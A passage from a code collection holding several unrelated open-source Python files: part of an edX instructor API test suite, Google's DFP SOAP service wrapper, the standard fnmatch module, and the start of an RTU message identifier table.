""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'robot-not-a-roll',
'action': 'revoke',
})
self.assertEqual(response.status_code, 400)
def test_modify_access_allow(self):
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_instructor.email,
'rolename': 'staff',
'action': 'allow',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke(self):
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'staff',
'action': 'revoke',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke_not_allowed(self):
""" Test revoking access that a user does not have. """
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.other_staff.email,
'rolename': 'instructor',
'action': 'revoke',
})
self.assertEqual(response.status_code, 200)
def test_modify_access_revoke_self(self):
"""
Test that an instructor cannot remove instructor privelages from themself.
"""
url = reverse('modify_access', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'email': self.instructor.email,
'rolename': 'instructor',
'action': 'revoke',
})
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_noparams(self):
""" Test missing all query parameters. """
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_bad_rolename(self):
""" Test with an invalid rolename parameter. """
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'robot-not-a-rolename',
})
print response
self.assertEqual(response.status_code, 400)
def test_list_course_role_members_staff(self):
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'staff',
})
print response
self.assertEqual(response.status_code, 200)
# check response content
expected = {
'course_id': self.course.id,
'staff': [
{
'username': self.other_staff.username,
'email': self.other_staff.email,
'first_name': self.other_staff.first_name,
'last_name': self.other_staff.last_name,
}
]
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
def test_list_course_role_members_beta(self):
url = reverse('list_course_role_members', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'rolename': 'beta',
})
print response
self.assertEqual(response.status_code, 200)
# check response content
expected = {
'course_id': self.course.id,
'beta': []
}
res_json = json.loads(response.content)
self.assertEqual(res_json, expected)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPILevelsDataDump(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints that show data without side effects.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.students = [UserFactory() for _ in xrange(6)]
for student in self.students:
CourseEnrollment.enroll(student, self.course.id)
def test_get_students_features(self):
"""
Test that some minimum of information is formatted
correctly in the response to get_students_features.
"""
url = reverse('get_students_features', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
res_json = json.loads(response.content)
self.assertIn('students', res_json)
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
self.assertEqual(student_json['username'], student.username)
self.assertEqual(student_json['email'], student.email)
def test_get_students_features_csv(self):
"""
Test that some minimum of information is formatted
correctly in the response to get_students_features.
"""
url = reverse('get_students_features', kwargs={'course_id': self.course.id})
response = self.client.get(url + '/csv', {})
self.assertEqual(response['Content-Type'], 'text/csv')
def test_get_distribution_no_feature(self):
"""
Test that get_distribution lists available features
when supplied no feature quparameter.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertEqual(type(res_json['available_features']), list)
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url + u'?feature=')
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertEqual(type(res_json['available_features']), list)
def test_get_distribution_unavailable_feature(self):
"""
Test that get_distribution fails gracefully with
an unavailable feature.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'feature': 'robot-not-a-real-feature'})
self.assertEqual(response.status_code, 400)
def test_get_distribution_gender(self):
"""
Test that get_distribution fails gracefully with
an unavailable feature.
"""
url = reverse('get_distribution', kwargs={'course_id': self.course.id})
response = self.client.get(url, {'feature': 'gender'})
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
print res_json
self.assertEqual(res_json['feature_results']['data']['m'], 6)
self.assertEqual(res_json['feature_results']['choices_display_names']['m'], 'Male')
self.assertEqual(res_json['feature_results']['data']['no_data'], 0)
self.assertEqual(res_json['feature_results']['choices_display_names']['no_data'], 'No Data')
def test_get_student_progress_url(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
url += "?student_email={}".format(
quote(self.students[0].email.encode("utf-8"))
)
print url
response = self.client.get(url)
print response
self.assertEqual(response.status_code, 200)
res_json = json.loads(response.content)
self.assertIn('progress_url', res_json)
def test_get_student_progress_url_noparams(self):
""" Test that the endpoint 404's without the required query params. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
def test_get_student_progress_url_nostudent(self):
""" Test that the endpoint 400's when requesting an unknown email. """
url = reverse('get_student_progress_url', kwargs={'course_id': self.course.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 400)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPIRegradeTask(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change student grades.
This includes resetting attempts and starting rescore tasks.
This test does NOT test whether the actions had an effect on the
database, that is the job of task tests and test_enrollment.
"""
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.problem_urlname = 'robot-some-problem-urlname'
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=_msk_from_problem_urlname(
self.course.id,
self.problem_urlname
),
state=json.dumps({'attempts': 10}),
)
def test_reset_student_attempts_deletall(self):
""" Make sure no one can delete all students state on a problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
'delete_module': True,
})
print response.content
self.assertEqual(response.status_code, 400)
def test_reset_student_attempts_single(self):
""" Test reset single student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
# make sure problem attempts have been reset.
changed_module = StudentModule.objects.get(pk=self.module_to_reset.pk)
self.assertEqual(
json.loads(changed_module.state)['attempts'],
0
)
# mock out the function which should be called to execute the action.
@patch.object(instructor_task.api, 'submit_reset_problem_attempts_for_all_students')
def test_reset_student_attempts_all(self, act):
""" Test reset all student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
def test_reset_student_attempts_missingmodule(self):
""" Test reset for non-existant problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': 'robot-not-a-real-module',
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 400)
def test_reset_student_attempts_delete(self):
""" Test delete single student state. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
'delete_module': True,
})
print response.content
self.assertEqual(response.status_code, 200)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.module_to_reset.course_id,
# module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_student_attempts_nonsense(self):
""" Test failure with both student_email and all_students. """
url = reverse('reset_student_attempts', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 400)
@patch.object(instructor_task.api, 'submit_rescore_problem_for_student')
def test_rescore_problem_single(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
@patch.object(instructor_task.api, 'submit_rescore_problem_for_all_students')
def test_rescore_problem_all(self, act):
""" Test rescoring for all students. """
url = reverse('rescore_problem', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
print response.content
self.assertEqual(response.status_code, 200)
self.assertTrue(act.called)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestInstructorAPITaskLists(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor task list endpoint.
"""
class FakeTask(object):
""" Fake task object """
FEATURES = ['task_type', 'task_input', 'task_id', 'requester', 'created', 'task_state']
def __init__(self):
for feature in self.FEATURES:
setattr(self, feature, 'expected')
def to_dict(self):
""" Convert fake task to dictionary representation. """
return {key: 'expected' for key in self.FEATURES}
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.problem_urlname = 'robot-some-problem-urlname'
self.module = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=_msk_from_problem_urlname(
self.course.id,
self.problem_urlname
),
state=json.dumps({'attempts': 10}),
)
self.tasks = [self.FakeTask() for _ in xrange(6)]
@patch.object(instructor_task.api, 'get_running_instructor_tasks')
def test_list_instructor_tasks_running(self, act):
""" Test list of all running tasks. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor_task.api, 'get_instructor_task_history')
def test_list_instructor_tasks_problem(self, act):
""" Test list task history for problem. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_urlname': self.problem_urlname,
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor_task.api, 'get_instructor_task_history')
def test_list_instructor_tasks_problem_student(self, act):
""" Test list task history for problem AND student. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'problem_urlname': self.problem_urlname,
'student_email': self.student.email,
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
expected_res = {'tasks': expected_tasks}
self.assertEqual(json.loads(response.content), expected_res)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
@override_settings(ANALYTICS_SERVER_URL="http://robotanalyticsserver.netbot:900/")
@override_settings(ANALYTICS_API_KEY="robot_api_key")
class TestInstructorAPIAnalyticsProxy(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor analytics proxy endpoint.
"""
class FakeProxyResponse(object):
""" Fake successful requests response object. """
def __init__(self):
self.status_code = instructor.views.api.codes.OK
self.content = '{"test_content": "robot test content"}'
class FakeBadProxyResponse(object):
""" Fake strange-failed requests response object. """
def __init__(self):
self.status_code = 'notok.'
self.content = '{"test_content": "robot test content"}'
def setUp(self):
self.instructor = AdminFactory.create()
self.course = CourseFactory.create()
self.client.login(username=self.instructor.username, password='test')
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_url(self, act):
""" Test legacy analytics proxy url generation. """
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 200)
# check request url
expected_url = "{url}get?aname={aname}&course_id={course_id}&apikey={api_key}".format(
url="http://robotanalyticsserver.netbot:900/",
aname="ProblemGradeDistribution",
course_id=self.course.id,
api_key="robot_api_key",
)
act.assert_called_once_with(expected_url)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy(self, act):
"""
Test legacy analytics content proxyin, actg.
"""
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 200)
# check response
self.assertTrue(act.called)
expected_res = {'test_content': "robot test content"}
self.assertEqual(json.loads(response.content), expected_res)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_reqfailed(self, act):
""" Test proxy when server reponds with failure. """
act.return_value = self.FakeBadProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {
'aname': 'ProblemGradeDistribution'
})
print response.content
self.assertEqual(response.status_code, 500)
@patch.object(instructor.views.api.requests, 'get')
def test_analytics_proxy_missing_param(self, act):
""" Test proxy when missing the aname query parameter. """
act.return_value = self.FakeProxyResponse()
url = reverse('proxy_legacy_analytics', kwargs={'course_id': self.course.id})
response = self.client.get(url, {})
print response.content
self.assertEqual(response.status_code, 400)
self.assertFalse(act.called)
class TestInstructorAPIHelpers(TestCase):
""" Test helpers for instructor.api """
def test_split_input_list(self):
strings = []
lists = []
strings.append("Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed")
lists.append(['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed'])
for (stng, lst) in zip(strings, lists):
self.assertEqual(_split_input_list(stng), lst)
def test_split_input_list_unicode(self):
self.assertEqual(_split_input_list('robot@robot.edu, robot2@robot.edu'), ['robot@robot.edu', 'robot2@robot.edu'])
self.assertEqual(_split_input_list(u'robot@robot.edu, robot2@robot.edu'), ['robot@robot.edu', 'robot2@robot.edu'])
self.assertEqual(_split_input_list(u'robot@robot.edu, robot2@robot.edu'), [u'robot@robot.edu', 'robot2@robot.edu'])
scary_unistuff = unichr(40960) + u'abcd' + unichr(1972)
self.assertEqual(_split_input_list(scary_unistuff), [scary_unistuff])
def test_msk_from_problem_urlname(self):
args = ('MITx/6.002x/2013_Spring', 'L2Node1')
output = 'i4x://MITx/6.002x/problem/L2Node1'
self.assertEqual(_msk_from_problem_urlname(*args), output)
@raises(ValueError)
def test_msk_from_problem_urlname_error(self):
args = ('notagoodcourse', 'L2Node1')
_msk_from_problem_urlname(*args)
| agpl-3.0 |
lociii/googleads-python-lib | adspygoogle/dfp/GenericDfpService.py | 2 | 9822 | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic proxy to access any DFP web service."""
__author__ = 'api.jdilallo@gmail.com (Joseph DiLallo)'
import time
from adspygoogle import SOAPpy
from adspygoogle.common import Utils
from adspygoogle.common.Errors import Error
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.GenericApiService import GenericApiService
from adspygoogle.common.GenericApiService import MethodInfoKeys
from adspygoogle.dfp import AUTH_TOKEN_EXPIRE
from adspygoogle.dfp import AUTH_TOKEN_SERVICE
from adspygoogle.dfp import LIB_SIG
from adspygoogle.dfp import LIB_URL
from adspygoogle.dfp.DfpErrors import DfpApiError
from adspygoogle.dfp.DfpErrors import DfpError
from adspygoogle.dfp.DfpErrors import ERRORS
from adspygoogle.dfp.DfpSoapBuffer import DfpSoapBuffer
class GenericDfpService(GenericApiService):
"""Wrapper for any DFP web service."""
# The _IGNORED_HEADER_VALUES are keys in the headers dictionary passed into
# this class' constuctor which should NOT be packed into the SOAP header.
_IGNORED_HEADER_VALUES = ('authToken', 'email', 'password',
'oauth2credentials')
# The _WRAP_LISTS constant indicates that DFP services do not need to wrap
# lists in an extra layer of XML element tags.
_WRAP_LISTS = False
# The _BUFFER_CLASS is the subclass of SoapBuffer that should be used to track
# all SOAP interactions
_BUFFER_CLASS = DfpSoapBuffer
def __init__(self, headers, config, op_config, lock, logger, service_name):
"""Inits GenericDfpService.
Args:
headers: dict Dictionary object with populated authentication
credentials.
config: dict Dictionary object with populated configuration values.
op_config: dict Dictionary object with additional configuration values for
this operation.
lock: thread.lock Thread lock to use to synchronize requests.
logger: Logger Instance of Logger to use for logging.
service_name: string The name of this service.
"""
service_url = '/'.join([op_config['server'], 'apis/ads/publisher',
op_config['version'], service_name])
namespace = '/'.join(['https://www.google.com/apis/ads/publisher',
op_config['version']])
namespace_extractor = _DetermineNamespacePrefix
super(GenericDfpService, self).__init__(
headers, config, op_config, lock, logger, service_name, service_url,
GenericDfpService._WRAP_LISTS, GenericDfpService._BUFFER_CLASS,
namespace, namespace_extractor)
# DFP-specific changes to the SOAPpy.WSDL.Proxy
methodattrs = {
'xmlns:dfp': self._namespace,
'xmlns': self._namespace
}
self._soappyservice.soapproxy.methodattrs = methodattrs
def _SetHeaders(self):
"""Sets the SOAP headers for this service's requests."""
now = time.time()
if ((('authToken' not in self._headers and
'auth_token_epoch' not in self._config) or
int(now - self._config['auth_token_epoch']) >= AUTH_TOKEN_EXPIRE) and
not self._headers.get('oauth2credentials')):
if ('email' not in self._headers or not self._headers['email'] or
'password' not in self._headers or not self._headers['password']):
raise ValidationError('Required authentication headers, \'email\' and '
'\'password\', are missing. Unable to regenerate '
'authentication token.')
self._headers['authToken'] = Utils.GetAuthToken(
self._headers['email'], self._headers['password'], AUTH_TOKEN_SERVICE,
LIB_SIG, self._config['proxy'])
self._config['auth_token_epoch'] = time.time()
# Apply headers to the SOAPpy service.
soap_headers = SOAPpy.Types.headerType(attrs={'xmlns': self._namespace})
request_header_data = {}
if 'authToken' in self._headers:
authentication_block = SOAPpy.Types.structType(
data={'token': self._headers['authToken']},
name='authentication', typed=0,
attrs={(SOAPpy.NS.XSI3, 'type'): 'ClientLogin'})
request_header_data['authentication'] = authentication_block
for key in self._headers:
if (key in GenericDfpService._IGNORED_HEADER_VALUES or
not self._headers[key]):
continue
value = self._headers[key]
if key == 'applicationName':
value = ''.join([value, LIB_SIG])
request_header_data[key] = SOAPpy.Types.stringType(value)
request_header = SOAPpy.Types.structType(
data=request_header_data, name='RequestHeader', typed=0)
soap_headers.RequestHeader = request_header
if 'authToken' in self._headers:
soap_headers.RequestHeader._keyord = ['applicationName', 'authentication']
self._soappyservice.soapproxy.header = soap_headers
def _GetMethodInfo(self, method_name):
"""Pulls all of the relevant data about a method from a SOAPpy service.
The return dictionary has two keys, MethodInfoKeys.INPUTS and
MethodInfoKeys.OUTPUTS. Each of these keys has a list value. These lists
contain a dictionary of information on the input/output parameter list, in
order.
Args:
method_name: string The name of the method to pull information for.
Returns:
dict A dictionary containing information about a SOAP method.
"""
rval = {}
rval[MethodInfoKeys.INPUTS] = []
for i in range(len(self._soappyservice.wsdl.types[
self._namespace].elements[method_name].content.content.content)):
param_attributes = self._soappyservice.wsdl.types[
self._namespace].elements[method_name].content.content.content[
i].attributes
inparam = {
MethodInfoKeys.ELEMENT_NAME: param_attributes['name'],
MethodInfoKeys.NS: param_attributes['type'].getTargetNamespace(),
MethodInfoKeys.TYPE: param_attributes['type'].getName(),
MethodInfoKeys.MAX_OCCURS: param_attributes['maxOccurs']
}
rval[MethodInfoKeys.INPUTS].append(inparam)
rval[MethodInfoKeys.OUTPUTS] = []
for i in range(len(self._soappyservice.wsdl.types[
self._namespace].elements[
method_name + 'Response'].content.content.content)):
param_attributes = self._soappyservice.wsdl.types[
self._namespace].elements[
method_name + 'Response'].content.content.content[i].attributes
outparam = {
MethodInfoKeys.ELEMENT_NAME: param_attributes['name'],
MethodInfoKeys.NS: param_attributes['type'].getTargetNamespace(),
MethodInfoKeys.TYPE: param_attributes['type'].getName(),
MethodInfoKeys.MAX_OCCURS: param_attributes['maxOccurs']
}
rval[MethodInfoKeys.OUTPUTS].append(outparam)
return rval
def _HandleLogsAndErrors(self, buf, start_time, stop_time, error=None):
"""Manage SOAP XML message.
Args:
buf: SoapBuffer SOAP buffer.
start_time: str Time before service call was invoked.
stop_time: str Time after service call was invoked.
[optional]
error: dict Error, if any.
"""
if error is None:
error = {}
try:
handlers = self.__GetLogHandlers(buf)
fault = super(GenericDfpService, self)._ManageSoap(
buf, handlers, LIB_URL, start_time, stop_time, error)
if fault:
# Raise a specific error, subclass of DfpApiError.
if 'detail' in fault:
if 'code' in fault['detail']:
code = int(fault['detail']['code'])
if code in ERRORS: raise ERRORS[code](fault)
elif 'errors' in fault['detail']:
error_type = fault['detail']['errors'][0]['type']
if error_type in ERRORS: raise ERRORS[str(error_type)](fault)
if isinstance(fault, basestring):
raise DfpError(fault)
elif isinstance(fault, dict):
raise DfpApiError(fault)
except DfpApiError, e:
raise e
except DfpError, e:
raise e
except Error, e:
if error: e = error
raise Error(e)
def __GetLogHandlers(self, buf):
"""Gets a list of log handlers for the DFP library.
Args:
buf: SoapBuffer SOAP buffer from which calls are retrieved for logging.
Returns:
list Log handlers for the DFP library.
"""
return [
{
'tag': 'xml_log',
'name': 'soap_xml',
'data': ''
},
{
'tag': 'request_log',
'name': 'request_info',
'data': str('host=%s service=%s method=%s responseTime=%s '
'requestId=%s'
% (Utils.GetNetLocFromUrl(self._service_url),
self._service_name, buf.GetCallName(),
buf.GetCallResponseTime(), buf.GetCallRequestId()))
},
{
'tag': '',
'name': 'dfp_api_lib',
'data': ''
}
]
def _DetermineNamespacePrefix(url):
"""Returns the SOAP prefix to use for definitions within the given namespace.
Args:
url: string The URL of the namespace.
Returns:
string The SOAP namespace prefix to use for the given namespace.
"""
return 'dfp:'
| apache-2.0 |
tcheehow/MissionPlanner | Lib/fnmatch.py | 84 | 3355 | """Filename matching with shell patterns.
fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.
The functions operate by translating the pattern into a regular
expression. They cache the compiled regular expressions for speed.
The function translate(PATTERN) returns a regular expression
corresponding to PATTERN. (It does not compile it.)
"""
import re
__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]
_cache = {}
_MAXCACHE = 100
def _purge():
"""Clear the pattern cache"""
_cache.clear()
def fnmatch(name, pat):
"""Test whether FILENAME matches PATTERN.
Patterns are Unix shell style:
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
An initial period in FILENAME is not special.
Both FILENAME and PATTERN are first case-normalized
if the operating system requires it.
If you don't want this, use fnmatchcase(FILENAME, PATTERN).
"""
import os
name = os.path.normcase(name)
pat = os.path.normcase(pat)
return fnmatchcase(name, pat)
def filter(names, pat):
"""Return the subset of the list NAMES that match PAT"""
import os,posixpath
result=[]
pat=os.path.normcase(pat)
if not pat in _cache:
res = translate(pat)
if len(_cache) >= _MAXCACHE:
_cache.clear()
_cache[pat] = re.compile(res)
match=_cache[pat].match
if os.path is posixpath:
# normcase on posix is NOP. Optimize it away from the loop.
for name in names:
if match(name):
result.append(name)
else:
for name in names:
if match(os.path.normcase(name)):
result.append(name)
return result
def fnmatchcase(name, pat):
"""Test whether FILENAME matches PATTERN, including case.
This is a version of fnmatch() which doesn't case-normalize
its arguments.
"""
if not pat in _cache:
res = translate(pat)
if len(_cache) >= _MAXCACHE:
_cache.clear()
_cache[pat] = re.compile(res)
return _cache[pat].match(name) is not None
def translate(pat):
"""Translate a shell PATTERN to a regular expression.
There is no way to quote meta-characters.
"""
i, n = 0, len(pat)
res = ''
while i < n:
c = pat[i]
i = i+1
if c == '*':
res = res + '.*'
elif c == '?':
res = res + '.'
elif c == '[':
j = i
if j < n and pat[j] == '!':
j = j+1
if j < n and pat[j] == ']':
j = j+1
while j < n and pat[j] != ']':
j = j+1
if j >= n:
res = res + '\\['
else:
stuff = pat[i:j].replace('\\','\\\\')
i = j+1
if stuff[0] == '!':
stuff = '^' + stuff[1:]
elif stuff[0] == '^':
stuff = '\\' + stuff
res = '%s[%s]' % (res, stuff)
else:
res = res + re.escape(c)
return res + '\Z(?ms)'
| gpl-3.0 |
xiefeimcu/mcu_code | Python/pyqt/rtuUI/rtuMsg.py | 1 | 3918 | __author__ = 'xiefei'
import sys
import time
import datetime
import binascii
stu = {
'IDT_TT': 'TT' ,
'IDT_ST' : 'ST' ,
'IDT_RGZS' : 'RGZS' ,
'IDT_PIC' : 'PIC' ,
'IDT_DRP' : 'DRP' ,
'IDT_DRZ1' : 'DRZ1' ,
'IDT_DRZ2' : 'DRZ2' ,
'IDT_DRZ3' : 'DRZ3' ,
'IDT_DRZ4' : 'DRZ4' ,
'IDT_DRZ5' : 'DRZ5' ,
'IDT_DRZ6' : 'DRZ6' ,
'IDT_DRZ7' : 'DRZ7' ,
'IDT_DRZ8' : 'DRZ8' ,
'IDT_DATA' : 'DATA' ,
'IDT_AC' : 'AC' ,
'IDT_AI' : 'AI' ,
'IDT_C' : 'C' ,
'IDT_DRxnn' : 'DRxnn' ,
'IDT_DT' : 'DT' ,
'IDT_ED' : 'ED' ,
'IDT_EJ' : 'EJ' ,
'IDT_FL' : 'FL' ,
'IDT_GH' : 'GH' ,
'IDT_GN' : 'GN' ,
'IDT_GS' : 'GS' ,
'IDT_GT' : 'GT' ,
'IDT_GTP' : 'GTP' ,
'IDT_H' : 'H' ,
'IDT_HW' : 'HW' ,
'IDT_M10' : 'M10' ,
'IDT_M20' : 'M20' ,
'IDT_M30' : 'M30' ,
'IDT_M40' : 'M40' ,
'IDT_M50' : 'M50' ,
'IDT_M60' : 'M60' ,
'IDT_M80' : 'M80' ,
'IDT_M100' : 'M100' ,
'IDT_MST' : 'MST' ,
'IDT_NS' : 'NS' ,
'IDT_P1' : 'P1' ,
'IDT_P2' : 'P2' ,
'IDT_P3' : 'P3' ,
'IDT_P6' : 'P6' ,
'IDT_P12' : 'P12' ,
'IDT_PD' : 'PD' ,
'IDT_PJ' : 'PJ' ,
'IDT_PN01' : 'PN01' ,
'IDT_PN05' : 'PN05' ,
'IDT_PN10' : 'PN10' ,
'IDT_PN30' : 'PN30' ,
'IDT_PR' : 'PR' ,
'IDT_PT' : 'PT' ,
'IDT_Q ' : 'Q' ,
'IDT_Q1' : 'Q1' ,
'IDT_Q2' : 'Q2' ,
'IDT_Q3' : 'Q3' ,
'IDT_Q4' : 'Q4' ,
'IDT_Q5' : 'Q5' ,
'IDT_Q6' : 'Q6' ,
'IDT_Q7' : 'Q7' ,
'IDT_Q8' : 'Q8' ,
'IDT_QA' : 'QA' ,
'IDT_QZ' : 'QZ' ,
'IDT_SW' : 'SW' ,
'IDT_UC' : 'UC' ,
'IDT_UE' : 'UE' ,
'IDT_US' : 'US' ,
'IDT_VA' : 'VA' ,
'IDT_VJ' : 'VJ' ,
'IDT_VT' : 'VT' ,
'IDT_Z' : 'Z' ,
'IDT_ZB' : 'ZB' ,
'IDT_ZU' : 'ZU' ,
'IDT_Z1' : 'Z1' ,
'IDT_Z2' : 'Z2' ,
'IDT_Z3' : 'Z3' ,
'IDT_Z4' : 'Z4' ,
'IDT_Z5' : 'Z5' ,
'IDT_Z6' : 'Z6' ,
'IDT_Z7' : 'Z7' ,
'IDT_Z8' : 'Z8' ,
'IDT_SQ' : 'SQ' ,
'IDT_ZT' : 'ZT' ,
'IDT_pH' : 'pH' ,
'IDT_DO' : 'DO' ,
'IDT_COND' : 'COND' ,
'IDT_TURB' : 'TURB' ,
'IDT_CODMN' : 'CODMN' ,
'IDT_REDOX' : 'REDOX' ,
'IDT_NH4N' : 'NH4N' ,
'IDT_TP' : 'TP' ,
'IDT_TN' : 'TN' ,
'IDT_TOC' : 'TOC' ,
'IDT_CU' : 'CU' ,
'IDT_ZN' : 'ZN' ,
'IDT_SE' : 'SE' ,
'IDT_AS' : 'AS' ,
'IDT_THG' : 'THG' ,
'IDT_CD' : 'CD' ,
'IDT_PB' : 'PB' ,
'IDT_CHLA' : 'CHLA' ,
'IDT_WP1' : 'WP1' ,
'IDT_WP2' : 'WP2' ,
'IDT_WP3' : 'WP3' ,
'IDT_WP4' : 'WP4' ,
'IDT_WP5' : 'WP5' ,
'IDT_WP6' : 'WP6' ,
'IDT_WP7' : 'WP7' ,
'IDT_WP8' : 'WP8' ,
'IDT_SYL1' : 'SYL1' ,
'IDT_SYL2' : 'SYL2' ,
'IDT_SYL3' : 'SYL3' ,
'IDT_SYL4' : 'SYL4' ,
'IDT_SYL5' : 'SYL5' ,
'IDT_SYL6' : 'SYL6' ,
'IDT_SYL7' : 'SYL7' ,
'IDT_SYL8' : 'SYL8' ,
'IDT_SBL1' : 'SBL1' ,
'IDT_SBL2' : 'SBL2' ,
'IDT_SBL3' : 'SBL3' ,
'IDT_SBL4' : 'SBL4' ,
